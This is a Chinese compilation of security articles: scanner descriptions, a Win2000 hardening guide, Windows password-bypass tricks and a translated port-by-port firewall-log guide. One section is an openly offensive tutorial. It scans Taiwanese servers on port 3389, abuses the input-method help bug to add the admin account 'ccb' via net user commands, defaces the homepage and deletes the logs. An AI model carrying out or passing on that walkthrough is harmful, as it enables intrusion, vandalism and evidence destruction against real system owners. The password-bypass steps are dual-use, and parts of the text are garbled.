攻击防范六(整理)
八种扫描器说明
八种扫描器说明
⑴NSS(网络安全扫描器)
NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查:
■Sendmail
■匿名FTP
■NFS出口
■TFTP
■Hosts.equiv
■Xhost
注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。
利用NSS,用户可以增加更强大的功能,其中包括:
■AppleTalk扫描
■Novell扫描
■LAN管理员扫描
■可扫描子网
简单地说,NSS执行的进程包括:
■取得指定域的列表或报告,该域原本不存在这类列表
■用Ping命令确定指定主机是否是活性的
■扫描目标主机的端口
■报告指定地址的漏洞
尽管没有详尽讨论NSS,但我在这里要说明一些次要的问题:
■在对NSS进行解压缩后,不能立即运行NSS,需要对它进行一些修改,必须设置一些环境变量,以适应你的机器配置。主要变量包括:
■$TmpDir_NSS使用的临时目录
■$YPX-ypx应用程序的目录
■$PING_可执行的ping命令的目录
■$XWININFO_xwininfo的目录
提示:如果你隐藏了Perl include目录(目录中有Perl include文件),并且在PATH环境变量中没有包含该目录,你需要加上这个目录;同时,用户应该注意NSS需要ftplib.pl库函数。NSS具有并行能力,可以在许多工作站之间进行分布式扫描。而且,它可以使进程分支。在资源有限的机器上运行NSS(或未经允许运行NSS)应该避免这种情况,在代码中有这方面的选项设置。
你可在下面地址找到NSS拷贝。http://www.giga.or.at/pub/hacker/unix ;
⑵Strobe(超级优化TCP端口检测程序)
strobe是一个TCP端口扫描器,它可以记录指定机器的所有开放端口。strobe运行速度快(其作者声称在适中的时间内,便可扫描整个一个国家的机器)。
strobe的主要特点是,它能快速识别指定机器上正在运行什么服务。strobe的主要不足是这类信息是很有限的,一次strobe攻击充其量可以提供给“入侵者”一个粗略的指南,告诉什么服务可以被攻击。但是,strobe用扩展的行命令选项弥补了这个不足。比如,在用大量指定端口扫描主机时,你可以禁止所有重复的端口描述。(仅打印首次端口定义)其他选项包括:
■定义起始和终止端口
■定义在多长时间内接收不到端口或主机响应,便终止这次扫描。
■定义使用的socket号码
■定义strobe要捕捉的目标主机的文件
在如下地址可以找到strobe的拷贝:http://sunsite.kth.se/linux/system/network/admin/ ;
提示:在你获得strobe的同时,必然获得手册页面,这对于Solaris 2.3是一个明显的问题,为了防止发生问题,你必须禁止使用getpeername()。在行命令中加入-g 标志就可以实现这一目的。
同时,尽管strobe没有对远程主机进行广泛测试,但它留下的痕迹与早期的ISS一样明显,被strobe扫描过的主机会知道这一切(这非常象在/var/adm/messages文件中执行连接请求)。
⑶SATAN(安全管理员的网络分析工具)
SATAN是为UNIX设计的,它主要是用C和Perl语言编写的(为了用户界面的友好性,还用了一些HTML技术)。它能在许多类UNIX平台上运行,有些根本不需要移植,而在其他平台上也只是略作移植。
注意:在Linux上运行SATAN有一个特殊问题,应用于原系统的某些规则在Linus平台上会引起系统失效的致命缺陷;在tcp-scan模块中实现select()调用也会产生问题;最后要说的是,如果用户扫描一个完整子网,则会引进反向fping爆炸,也即套接字(socket)缓冲溢出。但是,有一个站点不但包含了用于Linux的、改进的SATAN二进制代码,还包含了diff文件,这些条款可以在ftp.lod.com
上发现,或者可以直接从Sun站点(sunsite.unc.edu)取得diff文件:
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN用于扫描远程主机的许多已知的漏洞,其中包括,但并不限于下列这些漏洞:
■FTPD脆弱性和可写的FTP目录
■NFS脆弱性
■NIS脆弱性
■RSH脆弱性
■Sendmail
■X服务器脆弱性
你可在下面地址中获得SATAN的拷贝:http://www.fish.com ;
安装过程
SATAN的安装和其他应用程序一样,每个平台上的SATAN目录可能略有不同,但一般都是/satan-1.1.1。安装的第一步(在阅读了使用文档说明后)是运行Perl程序reconfig。这个程序搜索各种不同的组成成分,并定义目录路径。如果它不能找到或定义一个浏览器。则运行失败,那些把浏览器安装在非标准目录中(并且没有在PATH中进行设置)的用户将不得不手工进行设置。同样,那些没有用DNS(未在自己机器上运行DNS)的用户也必须在/satan-1.1.1/conf/satan.cf中进行下列设置:$dont_use_nslookuo=1;在解决了全部路径问题后,用户可以在分布式系统上运行安装程序(IRIX或SunOS),我建议要非常仔细地观察编译,以找出错误。
提示:SATAN比一般扫描器需要更多一些的资源,尤其是在内存和处理器功能方面要求更高一些。如果你在运行SATAN时速度很慢,可以尝试几种解决办法。最直接的办法就是扩大内存和提高处理器能力,但是,如果这种办法不行,我建议用下面两种方法:一是尽可能地删除其他进程;二是把你一次扫描主机的数量限制在100台以下。最后说明的一点是,对于没有强大的视频支持或内存资源有限的主机,SATAN有一个行命令接口,这一点很重要。
⑷Jakal
Jakal是一个秘密扫描器,也就是就,它可以扫描一个区域(在防火墙后面),而不留下任何痕迹。
秘密扫描器工作时会产生“半扫描”(half scans),它启动(但从不完成)与目标主机的SYN/ACK过程。从根本上讲,秘密扫描器绕过了防火墙,并且避开了端口扫描探测器,识别出在防火墙后面运行的是什么服务。(这里包括了像Courtney和GAbriel这样的精制扫描探测器)
在下面地址中可以找到由Half life,Jeff(PhiJi)Fay和Abdullah Marahie编写的Jakal拷贝:http://www.giga.or.at.pub/hacker/unix ;
⑸IdentTCPscan
IdentTCPscan是一个更加专业化的扫描器,其中加入了识别指定TCP端口进程的所有者的功能,也就是说,它能测定该进程的UID。可在如下地址找到拷贝:http://www.giga.or.at/pub/hacker/unix ;
⑹CONNECT
CONNECT是一个bin/sh程序,它的用途是扫描TFTP服务子网。在下面地址可得到拷贝:http://www.giga.or.at/pub/hacker/unix/ ;
⑺FSPScan
FSPScan用于扫描FSP服务顺。FSP代表文件服务协议,是非常类似于FTP的Internet协议。它提供匿名文件传输,并且据说具有网络过载保护功能(比如,FSP从来不分叉)。FSP最知名的安全特性可能就是它记录所有到来用户的主机名,这被认为优于FTP,因为FTP仅要求用户的E-mail地址(而实际上根本没有进行记录)。FSP相当流行,现在为Windows 和OS/2开发了GUI客户程序。可在如下地址找到:http://www.giga.or.at/pub/hacker/unix ;
⑻XSCAN
XSCAN扫描具有X服务器弱点的子网(或主机)。乍一看,这似乎并不太重要,毕竟其他多数扫描器都能做同样的工作。然而,XSCAN包括了一个增加的功能:如果它找到了一个脆弱的目标,它会立即加入记录。
XSCAN的其他优点还包括:可以一次扫描多台主机。这些主机可以在行命令中作为变量键入(并且你可以通过混合匹配同时指定主机和子网)。可在如下地址找到:http://www.giga.or.at/pub/hacker/unix ;
WINNT2000的简单攻击
呵呵!快到春节,为了纪念这个传统的节日,我们一些网友决定对台湾进行一次检测,不过我发现一些网友对NT/2000服务器的攻击还有不懂的地方,今天先给大家讲讲3389端口开放配合输入法漏洞主机的攻击方法,讲的不好的地方请大家多多包涵!
准备工具:scanner 扫描仪 点击下载
:mstsc.exe 客户端软件 点击下载
首先打开scanner扫描一段台湾的ip。啊?你不会用这个扫描仪?我倒!先看看我写的新手上路,那里有详解(图文),端口是3389,不一会,扫到很多开放3389的主机,放到url里,看看哪个有主页,(其实没有的也可以的),呵呵!记下ip关掉扫描仪、
打开mstsc.exe客户端软件,把你刚刚扫到的主机添加到服务器栏,其它的用默认就可以了,点连接。即出现了win2000的登陆提示框,首先在用户名的那一项上先用鼠标点一下,将光标放在那里,在用shift+ctrl键将输入法转到全拼,是否出现了出现了全拼输入法的图标,右键单击微软的图标,弹出一个选项,这个选项有帮肋,版本信息,手工造词,和设置四个选项。
我们主要是看这个帮肋,如果帮肋是灰色的,不能点,换一台吧,反正肉机有都是,呵呵,点帮肋--输入法入门,就会弹出一个输入法操做指南的窗口,在空白处点右键,选最下面的一项,跳转至url.在此框中输入C:/WINNT/system32,按确定,就进入了他的system32目录下了,在此目录下找到net.exe的文件,单击右键创建快捷方式,找到这个快捷方式,点右键,选择属性,在里面找到目标这个窗口。里面的默认是C:/WINNT/system32/net.exe 在这个命令后面加上空格user ccb ccb /add ,确定之后,双击运行,双击之后没运行?呵呵!它是在后台运行,你看不到的!这样我们就创建了一个用户名和密码都是ccb的账号,也就是user:ccb password:ccb 的账号。但是这个ccb还是普通的权限。我们现在要做的是把这个ccb这账号提升到Administators的权限,还是找到刚才创建的那个net.exe的快捷方式,选属性,目标,在C:/WINNT/system32/net.exe 后加上一个空格localgroup administrators ccb/add,这样我们就将ccb这个账号提升到administrators 权限了,点击确定后双击运行,关掉其它窗口,只留下最初登陆的窗口就可以了,在登陆窗口的用户名里填上ccb.密码ccb,确定,呵呵,进去了吧!(如图)
现在你就是超级权限了,接下的事就由不得我了,呵呵!看看主页放在哪里了,MD,这个webmaster也太咸湿了,非要把主页放在缺省的c:/inetpub/wwwroot里,我都快求求他了,改改地方不行吗?改主页这么菜的问题就不用我教你了吧,呵呵!最后别忘了D掉日志,c:/WINNT/system32/logfiles/*.* 不会?看看高手写的日志清除方法吧!点 此
常见手工入侵检测
当我们架设起一台WIN2000服务器后,很多服务都是系统默认安装的,其中有些服务是我们平时
很少使用或根本就用不上的。而这些服务往往漏洞多多,容易被黑客利用来攻击我们的服务器。
WIN2000服务器漏洞检测:
一.基于应用的检测技术。采用被动的、非破坏性的办法检查应用软件包的设置,发现安全漏
洞。
二.基于主机的检测技术。采用被动的、非破坏性的办法对系统进行检测。通常涉及系统内核、
文件属性、操作系统补丁问题,还包括口令解密。因此,可以非常准确的定位系统存在的问题,
发现系统漏洞。其缺点是与平台相关,升级复杂。
三.基于目标的漏洞检测技术。它采用被动的、非破坏性的办法检查系统属性和文件属性,如
数据库、注册号等。通过消息文摘算法,对文件的加密数进行检验。
四.基于网络的检测技术。它采用积极的、非破坏性的办法来检验系统是否有可能被攻击崩溃。
利用一系列脚本对系统进行攻击,然后对结果进行分析。网络检测技术常被用来进行穿透实验
和安全审记。这种技术可以发现一系列平台的漏洞,也容易安装。但是,它容易影响网络的性
能,对系统内部检验不到。
五.综合的技术。集中了以上四种技术的优点,极大的增强了漏洞识别的精度。
使用漏洞检测技术时,应该注意以下几点:
1 合理的检测分析的位置;
2 完善的报表功能与灵活的配置特性;
3 可提供多种检测后的解决方案;
4 检测系统本身的完整性等。
我们如何实现手工检测呢?最简单,最方便的还是利用扫描软件来完成。所以也可以说,黑客扫
描器是把双刃剑,看使用它的人用它来作什么了,呵呵。
下面结合几种扫描和监控的软件来看看如何发现漏洞和补上漏洞:
我们可以用CMD命令行扫描器TWWWSCAN 参考[图1]
扫描出服务器存在IDQ、IDA影射溢出漏洞,
解决方法:在INTERNET信息管理器设置,把WEB站点属性--》主目录--》配置里的IDQ、IDA影射
删除掉即可。
接着我们用流光漏洞扫描器来为服务器检测吧,运行程序,选择要扫描的漏洞资料,如果你的
服务器安装了SQL SERVER 的话,建议扫描SQL 空口令。选流光主菜单的探测--》扫描SQL主机
如果服务器存在SQL的SA空口令漏洞,探测结果会显示,参考[图3]。
解决方法:运行SQLSERVER管理工具,给SA帐号加上强壮密码,还要在SQL命令行执行:
“if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]
') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo]
.[xp_cmdshell]' ”
GO
或:
“use master
sp_dropextendedproc 'xp_cmdshell'”
这样就算攻击者获得SA帐号密码远程连接后,也不能调用CMDSHELL了。
另外一个也是很常用的数据库MYSQL,默认安装后也存在ROOT空口令漏洞,如果你不补上的话,
INTERNET上任意远程主机都可以连接你服务器上的MYSQL数据库,任意编辑,修改,删除数据库
甚至可以通过它来提升权限,完全控制你的服务器。所以必须重视。
解决方法:在mysql>状态下输入:
grant select,insert,update,delete on *.* to root@"%" identified by "pass";
语句即可为ROOT设置口令。这样攻击者就不能远程连接本机数据库了。参考[图4]
如果你的服务器安装了PERL解析,很可能会存在CGI漏洞。
解决方法:这就需要打齐微软的最新补丁,在IIS里把CGI论坛的图片目录属性设置成(无)
即不运行任何教程和程序,这样可以最大限度的减少被攻击的风险。
我们可以利用数据监控软件[COMMVIEW]来监视进出本服务器的数据包,经过的端口。参考[图5]。
还可以检查可疑数据包的内容,
这样我们就不会对服务器的运行一无所知,在被攻击前或被攻击后找出攻击者的信息,制定出
相应的解决方案。
黑客必须具备的技能
真正的黑客,是指对网络安全形成威胁的人,而不是那些使用某种现成工具对网络进行攻击的攻击者,真正的黑客管这种人叫做script kids(只会使用工具的孩子),虽然script kids也会对网络安全构成一定的威胁,但是这类进攻是比较容易防范的。真正厉害的角色是那些具备相当深厚的系统知识的人。
其实黑客应该对所有的计算机知识了如指掌,而不是单单掌握与攻击相关的知识。当然,从单纯的攻击方面来讲还是必须了解一些与其他计算机工作人员不同的内容,列举如下:
1。必须对网络上常见的操作系统有深入的研究,例如Unix,windowsNT等。这里说的是深入研究,而不是简单的学会使用,应该了解系统内核的工作原理以及系统上运行的常用软件的使用方法。
2。应该熟悉各种网络协议,在因特网上主要是TCP/IP协议。
3。黑客应该首先是程序员。如果对编程一窍不通,只是简单的使用工具,那只能对个别的特定系统进行攻击,是不可能真正威胁到大量系统安全的。
4。收集相关的系统漏洞。对已知漏洞的分析有利于发现新的漏洞和提高安全的防护能力
过滤广告的软件
http://www.8715.com/llpopupkill/llpopupkill.zip
关于WINXP的密码
Windows XP强大而友好的系统界面博得了越来越多用户的青睐,然而它对用户安全性的审核即是非常严格的,要是你忘记了设置的口令(密码),可别以为能够像Windows98那样选择“取消”同样可以进入系统--这一点相信安装Windows XP的你,是很清楚的。当然这也是有过痛苦的经历后,才被我们重视的。
由于没有登陆口令,无法进入系统;起初的方法总是选择重新安装Windows XP,但这种方法但繁琐,而且费时费力,经过多次实验之后,终于找到了一个可以不需要任何其它软件,就可破解Windows XP登录口令的方法:
但是破解登陆口令,需要有两个必要的前提:
1.安装Windows XP的分区必须采用FAT32文件系统;
2.用户名中没有汉字。
在确认满足这两个条件后,即可执行以下步骤,来破解登陆口令。
1.开机启动Win XP,当运行到“正在启动Windows XP”的提示界面时,按“F8”键调出系统启动选择菜单,选择“带命令行安全模式”;
2.当运行停止后,会列出“Administrator”和其它用户的选择菜单(本例的其他用户以xpuser01为例),选择“Administrator”后回车,进入命令行模式;
3.键入命令““net user xpuser01 1234/ADD”这是更改该用户密码的命令,命令中的“1234”是更改后的新密码,如果键入的用户不存在(xpuser01),那么系统会自动添加这个用户。
4.另外还可以使用“net 1oca1group administrator xpuser01 /ADD”命令把xpuser01这个用户升为超级用户,即可拥有所有权限。
5.最后一步,就是重新启动计算机,在登录窗口中输入刚刚更改的新密码便可成功登陆。
如果你正在为丢失了登陆口令而烦恼的话,不妨试一试此方法。
以下方法是WIN2000的,但我想XP一样用:
(1) 如果使用NTFS文件系统,可将故障计算机上的硬盘取下,以从盘模式挂接到其它的Win2000计算机上.下面的操作以后一种情况为准,假设现在故障计算机的system分区(通常是C在新的计算机上成为分区E:.
(2) 编写一个能恢复管理员密码的批处理文件admin.bat,内容只需要一条"net user"命令即可.如下:
net user administrator 12345678
这儿我们假设当前的管理员是administrator,将它的密码恢复为"12345678".将文件admin.bat保存到"E:/winnt/system32/GroupPolicy/Machine/Scripts/Startup"下,也就是故障计算机原来的"C:/winnt/system32/GroupPolicy/Machine/Scripts/Startup"下.
(3) 编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变.内容如下:
[Startup]
0CmdLine=admin.bat
0Parameters=
将文件scripts.ini保存到"E:/winnt/system32/GroupPolicy/Machine/Scripts"下,也就是故障计算机原来的"C:/winnt/system32/GroupPolicy/Machine/Scripts"下.
(4) 将硬盘恢复为主盘,接回原来的计算机,重新启动,等待启动脚本运行.启动脚本运行结束管理员administrator的密码就被恢复为"12345678".
(5) 如果要新建一个管理员账号,admin.bat文件的内容可以修改为:
net user admin 12345678 /add
net localgroup administrators admin /add
这样一个名为"admin",密码是"12345678"的管理员账号就建立了.
这个方法不仅可以恢复独立服务器上本地管理员密码,也可以恢复Win2000域中域管理员的密码.
方法两种,非NTFS时 (684字) 没有名字了 (158518)于今天(09:07:05)..
方法一
开机后,Win2000自启动,出现登录窗口,显示用户名,并要求输入密码(当然这时你不会有密码)。这时请将输入焦点置于用户名一项,用Ctrl+Shift切换输入法(随便选上一种,只要能出现输入法工具条的就行)。在出现的输入法提示工具条上单击右键,选择帮助,会弹出一个帮助窗口。接下来你需要在这个窗口里找到一个(绿色带下划线)超级链接,并用SHIFT+鼠标左键单击,打开它会弹出一个IE窗口,请在窗口地址栏里输入c:,到这步你应该很清楚怎么做了。只要点击标准按键的“向上”,会发现你可以进入“控制面板”了,进入后你可以直奔“用户和密码”接下发生的事只有你自己知道了。^_^
注意:此方法只能在没有安装SP补丁前使用,因为后来有人把这个方法透露给老盖,老盖就把他龚断了。如果你不幸安装了SP补丁,请不要灰心,下面将继续给你介绍第二种方法。
方法二
用光盘(软盘)启动系统,或者说如果硬盘上有双系统,你也可以从另一个系统进入硬盘,只要你能进入win2000所在的分区,用哪种方法都行。进入后,找到winnt/system32/config目录下的sam文件,删除它后重启动,大功告成,很简单吧。
注意:如果win2000的系统分区为NTFS和NTFS格式,此方法无效。
注解:SAM,即安全账号管理数据库(Security Accounts Management Database),它是Win NT/2000操作系统的核心,其中存放了本地机和操作系统所控制域的组账号及用户账号信息。SAM中的开始存放了域中各组的描述信息和权限信息,接下来的部分存放了域用户的描述信息和加密后的密码数据等。超级用户Administrator的密码存放在SAM文件中最后一个“Administrator”的字串之后。
端口详解
端口可分为3大类:
1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。
常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)
另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。
Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。
11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11
19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)
还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。
UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。
23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。
25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。
53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。
需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。
67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。
79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。
98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)
109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。
110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。
111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。
记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。
119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?
这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节
139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。
143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
这一端口还被用于IMAP2,但并不流行。
已有一些报道发现有些0到143端口的攻击源于脚本。
161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。
SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。
162 SNMP trap 可能是由于错误配置
177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。
513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。
553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。
600 Pcserver backdoor 请查看1524端口
一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。
1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。
?ersion 0.4.1, June 20, 2000
http://www.robertgraham.com/pubs/firewall-seen.html
Copyright 1998-2000 by Robert Graham (mailto:[email protected].
All rights reserved. This document may only be reproduced (whole or
in part) for non-commercial purposes. All reproductions must
contain this copyright notice and must not be altered, except by
permission of the author.
1025 参见1024
1026 参见1024
1080 SOCKS
这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
1114 SQL
系统本身很少扫描这个端口,但常常是sscan脚本的一部分。
1243 Sub-7木马(TCP)
参见Subseven部分。
1524 ingreslock后门
许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。
2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS 杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。
3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
5632 pcAnywere
你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)
6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
13223 PowWow
